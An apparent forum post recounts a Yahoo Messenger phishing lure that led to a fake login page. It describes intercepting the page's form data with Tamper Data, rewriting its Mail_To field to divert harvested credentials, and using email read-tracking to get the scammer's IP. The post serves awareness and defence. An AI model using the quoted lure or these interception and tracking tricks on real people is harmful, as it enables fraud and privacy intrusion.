I would like to share with you a phishing experience I had to face recently.
For those who need an introduction on Phishing:
Phishing and Identity Theft
In computing, phishing is a form of criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well.
Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers.
Recently I received an instant message (yahoo) from one of my friend who is not very good with the technical aspects of Internet. He is just a common internet user. The message recieved :
Click this link and login ur yahoo id, u will get a wonderful gift enjoy. pls send this message to all ur buddies
As a normal enthusiastic user, we all have the tendency to open the link. When a user clicks on the above link, it opens a page as displayed below:
If you look closely at the displayed page, it looks very similar to yahoo login page. However, it is not a yahoo page. The cracker (lets not call him a hacker, as hacking is never un-ethical) has smartly created a web page which looks very similar to the login page of yahoo. When an novice user fills in the page with his username and password, and click the Sign In button, on the back ground, the entered user credentials (username and password) is sent to some database / email ID. My Friend entered his username and password unknowingly and .....So I decided to find the culprit.
Lets Find The Culprit
Using Tamper Data (an add-on for mozilla firefox), I captured the informations sent through this web page. See the below screen shot:
If you look at the above image very closely, you can easily understand the following facts (refer the red lines):
* When the user clicks the Sign In button, the page is re-directed to http://www2.fiberbit.net/form/mailto.cgi
* The page (or the script) is programmed in such a way that a mail will be sent to email@example.com. (refer the field "Mail_To")
* The mail will appear to come as if from SpArKz (refer the field "Mail_From")
* Once the mail is send, the page will be automatically redirected to http://photos.yahoo.com. (refer the field "Next_Page")
So we have found the cracker here. The person's email ID is firstname.lastname@example.org.
A step further.
Using the same tool mentioned above, the data send from a web page can be altered. So what I have done is, I changed the "Mail_To" value from email@example.com (internally the email id firstname.lastname@example.org is represented as love.cynade%40gmail.com) to email@example.com (my email ID). And hurray, i got the details delivered in my mail box. See the below screen shot:
It displayed the full information about the user who visited the site which includes:
* The ISP of the User - in my case it is Asianet.co.in.
* The IP address of the user - in my case it is 202.**.227.*** (not displayed due to various security reasons)
* These information can be further used to get into your personal system.
Tracing Down the Cracker
To trace the location of the hacker who was using the email ID firstname.lastname@example.org, I created a temperory email ID, registered a temperory account with ReadNotify.com and shooted some mails to email@example.com. And hooray, when he opened the mails I got the IP address of him and thats it.
I wrote to Yahoo also regarding the same and they immediately removed the site from Geocities and replied back. And withing weeks yahoo changed their login screen also. The cracker was able to get into many compromised accounts and from there to many accounts like banks, e-commerce sites etc using this simple techniques.
The Above quoted URL is currently not available as it is removed by Yahoo. But there are still thousands of phishing sites available that may exploit the human factor of the internet technology.
Do you have any similar experiences - share it here - what ways the hacker approached you? ......
MVP (Enterprise Security), ISLA-2010 (ISC)², C|EH, C|HFI, CCNA, MCP,
Certified ISO 27001:2005 Lead Auditor
[b]There are 3 roads to spoil; women, gambling & hacking. The most pleasant with women, the quickest with gambling, but the surest is hacking - c0c0n